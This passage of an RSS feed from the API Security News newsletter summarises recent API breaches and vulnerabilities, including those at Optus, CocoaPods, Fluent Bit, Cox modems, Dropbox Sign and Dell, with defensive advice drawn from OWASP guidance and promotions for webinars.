<p style="font-weight: 400;"><span style="font-weight: 400;">In </span><a href="https://apichangelog.substack.com/p/deactivating-an-api-one-step-at-a" target="_blank" rel="noopener"><span style="font-weight: 400;">this article</span></a><span style="font-weight: 400;">, Bruno Pedro presents a process for decommissioning APIs, taking into account the impact of changes on API consumers.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Deactivating a public API can be a delicate balancing act between a product engineering team that wants to sunset an aging API, and a customer success team that needs to communicate and manage change with API consumers who may be reluctant to make the necessary changes.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Importantly, this type of governance process also has significant security benefits by preventing zombie APIs. The recent zombie API breach at Optus, reported in our </span><a href="https://apisecurity.io/issue-249-major-api-breach-at-optus-cocoapods-exposed-bad-bots-and-api-dos-attacks-webinar-2024-api-breaches/" target="_blank" rel="noopener"><span style="font-weight: 400;">previous issue</span></a><span style="font-weight: 400;"> of this newsletter, highlights the risk when teams fail to properly manage an end-of-life process for their APIs.</span></p>
<p><span style="color: #808080;"><span style="font-weight: 400;">Thank you to 42Crunch’s </span><span style="font-weight: 400;">Fyodor Loenko</span><span style="font-weight: 400;"> for the share!</span></span></p>
<h2><span style="font-weight: 400;">Events: Black Hat Summit, Las Vegas</span></h2>
<p><span style="font-weight: 400;">The 42Crunch senior leadership and technical teams will be at Black Hat Summit next month in Las Vegas.  We will also be demoing our API security technology on the Microsoft Stand #1240 on Thursday on the main conference floor. If you’d like to </span><a href="mailto:sales@42crunch.com" target="_blank" rel="noopener"><span style="font-weight: 400;">schedule a meeting</span></a><span style="font-weight: 400;"> please reach out. </span></p>
<p>The post <a href="https://apisecurity.io/issue-250-authy-api-breach-us-agencies-push-secure-by-design-apis-grill-iot-devices-shares-by-our-readers/">Issue 250: Authy API breach, US agencies push secure by design, APIs grill IoT devices, shares by our readers</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 249: Major API breach at Optus, CocoaPods exposed, Bad Bots and API DoS attacks, Webinar: 2024 API breaches</title>
		<link>https://apisecurity.io/issue-249-major-api-breach-at-optus-cocoapods-exposed-bad-bots-and-api-dos-attacks-webinar-2024-api-breaches/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 04 Jul 2024 14:23:17 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11156</guid>

					<description><![CDATA[<p>This week, we share reports on the latest insights into the API breach at Optus and CocoaPods vulnerabilities reveal severe risks from the software supply chain. We examine the importance of API input validation for blocking DoS and authentication attacks. And finally a mention of our upcoming webinar examining recent API breaches and how to [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-249-major-api-breach-at-optus-cocoapods-exposed-bad-bots-and-api-dos-attacks-webinar-2024-api-breaches/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-249-major-api-breach-at-optus-cocoapods-exposed-bad-bots-and-api-dos-attacks-webinar-2024-api-breaches/">Issue 249: Major API breach at Optus, CocoaPods exposed, Bad Bots and API DoS attacks, Webinar: 2024 API breaches</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we share reports on the latest insights into the API breach at Optus and CocoaPods vulnerabilities reveal severe risks from the software supply chain. We examine the importance of API input validation for blocking DoS and authentication attacks. And finally a mention of our upcoming webinar examining recent API breaches and how to prevent them.</span></p>
<h2><span style="font-weight: 400;">Breach: API Governance and PII data exposure at Optus</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><a href="https://www.theregister.com/2024/06/21/optus_data_breach_faulty_api/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> from The Register explains how a coding error in an API&#8217;s access controls exposed the personal identifiable information (PII) of millions of Optus customers. We originally reported on this breach in </span><a href="https://apisecurity.io/issue-203-optus-data-breach-api-security-guide-authn-authz-vulnerabilities/" target="_blank" rel="noopener"><span style="font-weight: 400;">Issue 203</span></a><span style="font-weight: 400;">, from October 2022.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Importantly, the coding error was discovered and fixed for the API in one domain but was missed for another unused domain. This unused and vulnerable domain allegedly remained publicly available on the Internet for years, where it was eventually exploited by a malicious user to steal millions of customer records, including passport and driver&#8217;s license numbers and birth certificate information.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In this case, the target API was not in use and should have been decommissioned. API discovery tools are sometimes offered as a solution to finding unknown or forgotten APIs. However, how do you automatically discover an API that is both forgotten and unused? Additionally, most APIs use HTTPS where the API path is encrypted until TLS is terminated, so you need to know exactly where to look to find evidence of an unexpected API endpoint. With API discovery, you can&#8217;t find what you&#8217;re not looking for, let alone what you can&#8217;t see.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Forgotten “Zombie” APIs are often the result of a lack of collaboration between development, operations, and security teams. Organizations that want to avoid </span><a href="https://www.comcourts.gov.au/file/Federal/P/VID429/2024/3981938/event/31836639/document/2300547" target="_blank" rel="noopener"><span style="font-weight: 400;">legal action</span></a><span style="font-weight: 400;"> due to these types of API breaches should have explicit API governance processes in place to ensure that no API goes into production without the knowledge of the security team, and that an appropriate end-of-life process is implemented for every API. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Millions of devices impacted by Cocoapods software supply chain vulnerabilities</span></h2>
<p style="font-weight: 400;"><a href="https://www.evasec.io/blog/eva-discovered-supply-chain-vulnerabities-in-cocoapods#technical-remediation-steps" target="_blank" rel="noopener"><span style="font-weight: 400;">Researchers at EVA Information Security</span></a><span style="font-weight: 400;"> have discovered major vulnerabilities in Cocoapods ecosystem, with potentially devastating consequences for millions of iOS users and devices</span><span style="font-weight: 400;">. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Some of the vulnerabilities in this case were a direct result of flaws in API security. For example, ownership of Pods could be claimed by unauthorized users through an API that does not require authentication or authorization. The unauthorized user could then modify the Pod and affect all dependencies downstream in the supply chain, including major technology vendors, their applications, and devices. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Researchers also discovered a flaw in an API used to generate a session validation URL. The API code failed to properly validate input on HTTP headers, allowing a spoofed X-Forwarded-Host (XFH) header in the API request. This header was then used to set the domain of a session validation link, effectively passing the session validation under the control of an attacker.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">While these API vulnerabilities are worth considering, the most significant issue revealed is modern software development&#8217;s deep reliance on third-party and open-source software components. Vulnerabilities in these components, and even in the systems we depend on to manage these components such as CocoaPods, have profound consequences for dependent applications and APIs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recommended step to help manage software supply chain risks is the adoption of a Software Bill of Materials (</span><a href="https://www.cisa.gov/sbom" target="_blank" rel="noopener"><span style="font-weight: 400;">SBOM</span></a><span style="font-weight: 400;">), to provide an inventory of all components used to create an application or API. Evaluating risks can also help teams make informed decisions to avoid</span><a href="https://owasp.org/API-Security/editions/2023/en/0xaa-unsafe-consumption-of-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;"> unsafe consumption</span></a><span style="font-weight: 400;"> of third-party APIs, which makes the list of OWASP Top 10 API Vulnerabilities.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Logging utility found vulnerable to API DoS attack</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Fluent Bit is a logging utility used by many major global companies such as Google, Cisco, and Walmart. Recently, Tenable </span><a href="https://www.tenable.com/security/research/tra-2024-17" target="_blank" rel="noopener"><span style="font-weight: 400;">reported</span></a><span style="font-weight: 400;"> a vulnerability in a Fluent Bit monitoring API that could be exploited to corrupt memory and crash the service.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A common playbook used by hackers is to send corrupted input to an API in order to invoke an unexpected response and reveal an exploitable vulnerability. An API vulnerable to this attack will accept and process input data, without first performing the appropriate checks and validations to ensure the input is safe to use. This is typical for example of APIs deemed vulnerable to SQL injection or Path Traversal attacks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">With Fluent Bit, the API code was developed to assume that the input type was always a string, a pretty dangerous assumption by the developers as it turned out. When strings were replaced with integer values, the API blindly treated the input as the expected string types. The researchers were then able to exploit the discovered vulnerability and crash the system.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Your API testing team can adopt the mindset of a hacker and probe the API for vulnerabilities using malformed input and invalid data types. For example if an APIs input field is defined as a string, then test the APIs behavior when the input is a boolean, or an integer, or null. You can automate and scale these tests by leveraging an API’s OpenAPI file to read the expected data type for each input field. Then automatically fuzz the data type and verify the API’s response (anything other than a ‘400 bad input’ response likely indicates a security vulnerability).</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">If you want to learn more about this topic, be sure to check out the upcoming 42Crunch webinar mentioned below.</span></p>
<h2><span style="font-weight: 400;">Report: How Bad Bots are targeting authentication APIs</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In a </span><a href="https://www.imperva.com/resources/resource-library/reports/2024-bad-bot-report/" target="_blank" rel="noopener"><span style="font-weight: 400;">2024 industry report </span></a><span style="font-weight: 400;">on “bad bots”, Imperva recorded that 30% of API attacks were automated attacks, often seeking to exploit vulnerabilities in business logic. Additionally, nearly half of all account takeover attacks target authentication APIs, using credential stuffing and brute force attacks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Business logic vulnerabilities can be discovered through APIs by various means. As we saw in the previous article, hackers often send corrupted data in the API request in order to invoke unexpected behavior or response from the API.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">It is therefore important for API developers to ensure proper input validation of all incoming API requests, including the request payload, parameters, and headers. This can help limit a hacker or bot&#8217;s ability to probe an API with corrupted data to discover a vulnerability.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Additionally, even with reliable input validation, APIs can also be vulnerable to excessive data leaks. Again, API developers must ensure proper inspection and authorization of the API response to ensure additional business data is not unintentionally exposed.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Targeting authentication APIs also raises the need for rate limiting at the API level. Traditionally, businesses are well aware of the need to protect websites and applications against denial of service and brute force attacks. But as software teams move toward more API-centric development, security controls must also be applied specifically to protect API endpoints that might otherwise be vulnerable to account takeover attacks.</span></p>
<h2><strong>Webinars:<br />
</strong><span style="font-weight: 400;">Navigating the Depths of API Security with Microsoft &amp; 42Crunch</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;">July 10, 2024 | 10am PDT | 6pm BST</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">42Crunch and</span> <span style="font-weight: 400;">Microsoft give a deep dive on API security testing as part of the Reactor spotlight on GitHub Advanced Security. From scanning OpenAPI specs to dynamic testing, they’ll equip you with practical strategies to harden your APIs against attacks.</span></p>
<p style="font-weight: 400;"><a href="https://developer.microsoft.com/en-us/reactor/events/23009/?wt.mc_id=linkedin_23009_webpage_reactor" target="_blank" rel="noopener"><span style="font-weight: 400;">Register here</span></a></p>
<h2><span style="font-weight: 400;">Review of Major API Security Breaches from H1 2024</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">July 11, 2024 | 9am PDT | 5pm BST</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">I’m joined by my colleague Heshaam Attar as we review some of this year’s high-profile API vulnerabilities and breaches including the F5 Big-IP Next device and the Trello and Spoutible APIs. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;"><a href="https://42crunch.com/api-security-data-breaches-review-h1-2024/" target="_blank" rel="noopener">Register here</a></span></p>
<p><a href="https://42crunch.com/api-security-data-breaches-review-h1-2024/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-11159" src="https://apisecurity.io/wp-content/uploads/2024/07/API-Breaches-H1-2024-Social-300x172.png" alt="" width="602" height="345" srcset="https://apisecurity.io/wp-content/uploads/2024/07/API-Breaches-H1-2024-Social-300x172.png 300w, https://apisecurity.io/wp-content/uploads/2024/07/API-Breaches-H1-2024-Social-1024x588.png 1024w, https://apisecurity.io/wp-content/uploads/2024/07/API-Breaches-H1-2024-Social-768x441.png 768w, https://apisecurity.io/wp-content/uploads/2024/07/API-Breaches-H1-2024-Social-1536x883.png 1536w, https://apisecurity.io/wp-content/uploads/2024/07/API-Breaches-H1-2024-Social.png 1674w" sizes="auto, (max-width: 602px) 100vw, 602px" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-249-major-api-breach-at-optus-cocoapods-exposed-bad-bots-and-api-dos-attacks-webinar-2024-api-breaches/">Issue 249: Major API breach at Optus, CocoaPods exposed, Bad Bots and API DoS attacks, Webinar: 2024 API breaches</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 248: API penetration of apps and modems, GraphQL and its discontents, API security for supply chain and automotive</title>
		<link>https://apisecurity.io/issue-248-api-penetration-of-apps-and-modems-graphql-and-its-discontents-api-security-for-supply-chain-and-automotive/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 20 Jun 2024 07:21:38 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11138</guid>

					<description><![CDATA[<p>This week, we share reports on the API exploits of two enterprising students and their takedown of “big laundry”. We take a revealing look at API vulnerabilities exposing millions of modems to remote takeover. We also have two insightful articles on API security in the supply chain and automotive industries, and ask the question what [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-248-api-penetration-of-apps-and-modems-graphql-and-its-discontents-api-security-for-supply-chain-and-automotive/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-248-api-penetration-of-apps-and-modems-graphql-and-its-discontents-api-security-for-supply-chain-and-automotive/">Issue 248: API penetration of apps and modems, GraphQL and its discontents, API security for supply chain and automotive</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we share reports on the API exploits of two enterprising students and their takedown of “big laundry”. We take a revealing look at API vulnerabilities exposing millions of modems to remote takeover. We also have two insightful articles on API security in the supply chain and automotive industries, and ask the question what next for GraphQL.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Before we dive in, I’d like to introduce myself, Anthony Lonergan Developer Relations Lead with 42Crunch and the new Editor of your APIsecurity newsletter. I’d like to thank my colleague Colin Domoney for his great work over the past few years curating and editing the newsletter and wish him every success with his new book, Defending APIs. I will strive to maintain the editorial quality and adhere to the principles you’ve come to expect from one of the API security industry’s leading sources of relevant news.</span></p>
<h2><span style="font-weight: 400;">Breach: UC Santa Cruz students use vulnerable APIs to penetrate the largest laundry network in the US</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">First, </span><a href="https://techcrunch.com/2024/05/17/csc-serviceworks-free-laundry-million-machines/" target="_blank" rel="noopener"><span style="font-weight: 400;">this Techcrunch article</span></a><span style="font-weight: 400;"> about two UC Santa Cruz students who discovered API vulnerabilities that allowed them to remotely control washing machines for free, and add millions of dollars in credit to their laundry accounts (non redeemable, unfortunately for the students).</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The APIs in question lacked proper authorization controls. The important checks that should have been performed at the API, such as checking if the user has enough credit before starting a laundry service, were instead assumed to be performed by the client-side app. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is an all-too-common mistake when teams move from MVC to SPA. You cannot continue to rely on the client to put in place the necessary security checks, since a hacker can simply go directly to the APIs and by-pass the client.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">When it comes to designing, implementing and testing APIs, careful consideration should be given to the function or service provided via the API, and whether or not authorization controls need to be applied. This calls to mind the OWASP Top 10 API Security vulnerability: </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa6-unrestricted-access-to-sensitive-business-flows/" target="_blank" rel="noopener"><span style="font-weight: 400;">Unrestricted Access to Sensitive Business Flows</span></a><span style="font-weight: 400;">. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">OWASP recommends a two-tiered approach to mitigating your risks from this API vulnerability:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Identify the business flows to protect</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Select the appropriate protection mechanism</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">I would also include adding authentication and authorization tests to your API test suites, to verify that those controls are implemented correctly and consistently. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Notably, the students in this case made numerous attempts to ethically report the vulnerabilities to the vendor. For more technical details, I also recommend </span><a href="https://slugsec.ucsc.edu/posts/Laundry-2024" target="_blank" rel="noopener"><span style="font-weight: 400;">this blog post</span></a><span style="font-weight: 400;"> which explains the step by step process for uncovering and verifying the API vulnerabilities.</span></p>
<h2><span style="font-weight: 400;">Breach: API vulnerabilities exposed millions of Cox modems to remote hacking</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Securityweek recently <a href="https://www.securityweek.com/vulnerabilities-exposed-millions-of-cox-modems-to-remote-hacking/" target="_blank" rel="noopener">reported</a> a case of API vulnerabilities discovered in Wi-Fi modems of American telecommunications giant Cox Communications. The vulnerabilities, ethically reported by researcher Sam Curry, allow an unauthenticated user to send commands to the Wi-Fi modems of millions of residential and business customers, to extract PII data and change modem settings.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One of the key revelations that opened the door to the whole system was that the API response went from unauthorized to authorized, simply by making the exact same API request over and over again. This appears to be an unusual case of broken authorization.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">&#8220;Insanity is doing the same thing over and over again and expecting different results”… except for hacking APIs apparently.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Although the underlying cause of the vulnerability is unclear, the example presented in this article once again raises the importance of testing APIs for authorization vulnerabilities such as BOLA and BFLA. They occupy the top spots in the OWASP Top 10 lists due to their prevalence and potential impact.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Curry was also able to identify information about the API server infrastructure based on the structure and format of the APIs error response. This type of </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa8-security-misconfiguration/" target="_blank" rel="noopener"><span style="font-weight: 400;">security misconfiguration vulnerability</span></a><span style="font-weight: 400;"> can unintentionally help hackers (ethical or otherwise) strategically probe an API for other vulnerabilities. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">If you’re interested in a technical deep dive I highly recommend </span><a href="https://samcurry.net/hacking-millions-of-modems" target="_blank" rel="noopener"><span style="font-weight: 400;">this blog post</span></a><span style="font-weight: 400;"> from Sam Curry.</span></p>
<h2><span style="font-weight: 400;">Article: Why, after 6 years, I’m over GraphQL</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The pros and cons of GraphQL will no doubt continue to be discussed and debated over water coolers and in Slack channels for some time to come. We&#8217;ve certainly covered the topic from a security perspective several times in this newsletter.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">However, </span><a style="font-weight: 400;" href="https://bessey.dev/blog/2024/05/24/why-im-over-graphql/" target="_blank" rel="noopener"><span style="font-weight: 400;">this</span></a><span style="font-weight: 400;"> recent article by</span><span style="font-weight: 400;"> Matt Bessey, </span><span style="font-weight: 400;">a self-described former GraphQL champion, has certainly generated some more discussion and debate. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The takeaway is that for projects where greater emphasis is placed on non-functional factors, such as security, performance, and maintainability, the perceived merits of GraphQL are quickly outweighed by the difficulties. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">You can read more in the followup online discussions </span><a href="https://news.ycombinator.com/item?id=40521518" target="_blank" rel="noopener"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Article: The vital role of APIs in modern supply chain logistics</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Modern supply chains demonstrate both the opportunities and risks associated with integrating complex systems via APIs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">APIs facilitate essential automation of data flows and coordination of processes across disparate technology platforms that modern supply chains depend on. However, </span><a href="https://www.forbes.com/sites/forbestechcouncil/2024/05/29/the-vital-role-of-apis-in-modern-supply-chain-logistics/" target="_blank" rel="noopener"><span style="font-weight: 400;">this Forbes article</span></a><span style="font-weight: 400;"> highlights some of the security risks that should be considered before adding third-party APIs to a supply chain.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In the event of excessive data exposure, it is the responsibility of the API producer to ensure that only necessary and permitted data is returned in any API response. If too much data is returned by the API, and especially when that data is sensitive in nature, it can cause security incidents and undermine trust in the supply chain system.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The other vulnerability discussed in the Forbes article concerns <a href="https://owasp.org/API-Security/editions/2023/en/0xaa-unsafe-consumption-of-apis/" target="_blank" rel="noopener">unsafe consumption of APIs</a>. Here, the onus is on the API consumer to securely integrate any external API into the supply chain and not automatically trust third party data, even if it comes from a trusted partner or a reputable organization.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">OWASP recommends the following steps to help create secure API integrations: </span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">When evaluating service providers, assess their API security posture.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Ensure all API interactions happen over a secure communication channel (TLS).</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Always validate and properly sanitize data received from integrated APIs before using it.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Maintain an allowlist of well-known locations integrated APIs may redirect yours to: do not blindly follow redirects.</span></li>
</ul>
<h2><span style="font-weight: 400;">Article: API security for the connected vehicle</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Best practices in software development are a key requirement in producing reliable software in the automotive industry, codified in industry standards such as Automotive Spice and ISO-26262. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Many of these same rigorous practices also apply to API development. Security requirements must be carefully captured, implemented, tested, and verified to ensure that running APIs are secure by design.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">As the requirements of modern vehicles evolve towards more complex functionality, as well as more sophisticated connectivity to external clouds, applications and backend systems, APIs are increasingly leveraged to power these connections.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">And it is in this digital evolution towards increasing adoption of APIs that the automotive industry has recognized and responded to the growing cybersecurity risk on automotive software.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This month, Trend Micro subsidiary VicOne </span><a href="https://42crunch.com/buckle-up-and-protect-your-ride-the-importance-of-api-security-for-the-connected-vehicle/" target="_blank" rel="noopener"><span style="font-weight: 400;">announced a new partnership</span></a><span style="font-weight: 400;"> with 42Crunch to address growing API cybersecurity challenges for the automotive industry, together offering a comprehensive solution to help automakers comply with new regulations and standards for API protection.</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11139" src="https://apisecurity.io/wp-content/uploads/2024/06/VIcOne-42Crunch-Security-Chart-e1717077565624-300x156.png" alt="" width="600" height="312" srcset="https://apisecurity.io/wp-content/uploads/2024/06/VIcOne-42Crunch-Security-Chart-e1717077565624-300x156.png 300w, https://apisecurity.io/wp-content/uploads/2024/06/VIcOne-42Crunch-Security-Chart-e1717077565624-1024x532.png 1024w, https://apisecurity.io/wp-content/uploads/2024/06/VIcOne-42Crunch-Security-Chart-e1717077565624-768x399.png 768w, https://apisecurity.io/wp-content/uploads/2024/06/VIcOne-42Crunch-Security-Chart-e1717077565624-1536x798.png 1536w, https://apisecurity.io/wp-content/uploads/2024/06/VIcOne-42Crunch-Security-Chart-e1717077565624.png 1772w" sizes="auto, (max-width: 600px) 100vw, 600px" /></p>
<hr />
<p><img loading="lazy" decoding="async" class="alignnone size-medium wp-image-11147" src="https://apisecurity.io/wp-content/uploads/2024/06/Antony-Speaker-Card-V2-300x130.png" alt="" width="300" height="130" srcset="https://apisecurity.io/wp-content/uploads/2024/06/Antony-Speaker-Card-V2-300x130.png 300w, https://apisecurity.io/wp-content/uploads/2024/06/Antony-Speaker-Card-V2-1024x444.png 1024w, https://apisecurity.io/wp-content/uploads/2024/06/Antony-Speaker-Card-V2-768x333.png 768w, https://apisecurity.io/wp-content/uploads/2024/06/Antony-Speaker-Card-V2.png 1482w" sizes="auto, (max-width: 300px) 100vw, 300px" /></p>
<p>The post <a href="https://apisecurity.io/issue-248-api-penetration-of-apps-and-modems-graphql-and-its-discontents-api-security-for-supply-chain-and-automotive/">Issue 248: API penetration of apps and modems, GraphQL and its discontents, API security for supply chain and automotive</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 247: Dropbox and Dell breaches, vulnerability in Next.js, API growth causing concerns</title>
		<link>https://apisecurity.io/issue-247-dropbox-and-dell-breaches-vulnerability-in-next-js-api-growth-causing-concerns/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Fri, 31 May 2024 15:47:04 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11133</guid>

					<description><![CDATA[<p>This week, we have news of two high-profile breaches. First up is the Dropbox breach, potentially affecting millions of users, and then the Dell breach, affecting 49 million records. We also have details of a vulnerability in the Next.js component. We also have a free on-demand recording from Microsoft Build on Navigating the Depths of [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-247-dropbox-and-dell-breaches-vulnerability-in-next-js-api-growth-causing-concerns/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-247-dropbox-and-dell-breaches-vulnerability-in-next-js-api-growth-causing-concerns/">Issue 247: Dropbox and Dell breaches, vulnerability in Next.js, API growth causing concerns</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we have news of two high-profile breaches. First up is the Dropbox breach, potentially affecting millions of users, and then the Dell breach, affecting 49 million records. We also have details of a vulnerability in the Next.js component. We also have a free on-demand recording from Microsoft Build on Navigating the Depths of API Security testing. We share an article on how API growth is causing cybersecurity concerns and the menace of unknown APIs. Finally, we have a refresh of the excellent </span><i><span style="font-weight: 400;">Awesome API Security</span></i><span style="font-weight: 400;"> guide. </span></p>
<h2><span style="font-weight: 400;">Breach: Dropbox users in major data breach</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The</span><a href="https://cybernews.com/news/dropbox-sign-breach-user-info-compromised/" target="_blank" rel="noopener"><span style="font-weight: 400;"> first breach this week</span></a><span style="font-weight: 400;"> was a potentially large-scale one suffered by Dropbox. Dropbox disclosed a data breach affecting its Dropbox Sign (formerly HelloSign) users. The company filed a breach disclosure with the US Securities and Exchange Commission (SEC) and posted a blog alerting customers about the incident on April 24th, 2024.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Unauthorized access was gained to the Dropbox Sign production environment, compromising customer information such as emails, usernames, phone numbers, hashed passwords, account settings, and authentication information (API keys, OAuth tokens, and multi-factor authentication). This breach is important from an API security viewpoint since many corporate users are potentially using Dropbox as a storage vault, which may contain critical authentication credentials. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The breach was limited to the Dropbox Sign infrastructure, and other Dropbox products were not impacted. There is no evidence that customer account information, including contract agreements, templates, or payment information, was accessed.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The threat actor used a compromised service account to escalate privileges within the Sign&#8217;s production environment and access the customer database.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Dropbox is contacting impacted users with instructions on how to protect their data. The company has reset user passwords, logged users out of connected devices, and rotated API keys and OAuth tokens. Dropbox is working with outside forensic security investigators, and law enforcement has been notified. </span></p>
<h2><span style="font-weight: 400;">Breach: Dell API abused to steal 49 million records</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The</span><a href="https://www.bleepingcomputer.com/news/security/dell-api-abused-to-steal-49-million-customer-records-in-data-breach/" target="_blank" rel="noopener"><span style="font-weight: 400;"> next breach</span></a><span style="font-weight: 400;"> is the scraping attack successfully launched against Dell. A threat actor known as Menelik abused a partner portal API to scrape the information of approximately 49 million Dell customer records. The stolen data included customer names, order numbers, service tags, installed locations, and more. It appears no financial information was included in the breach.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">According to the threat actor, they could easily register multiple fake partner accounts to gain access to the portal. They then created a program to generate service tags and submit API requests, scraping customer data at a rate of 5,000 requests per minute for three weeks in March 2024 before Dell detected and stopped the activity. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The threat actor claims they emailed Dell about the vulnerability in April before putting the data up for sale on a hacking forum. However, Dell states they were aware of and investigating the incident before receiving the actor&#8217;s email.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This incident highlights the risk of companies having easily accessible APIs without proper rate limiting and verification processes, which threat actors are increasingly abusing to conduct large-scale data scraping and breaches. Implementing stricter controls around API access is critical for preventing such incidents.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Critical Next.js vulnerability allows server compromise</span></h2>
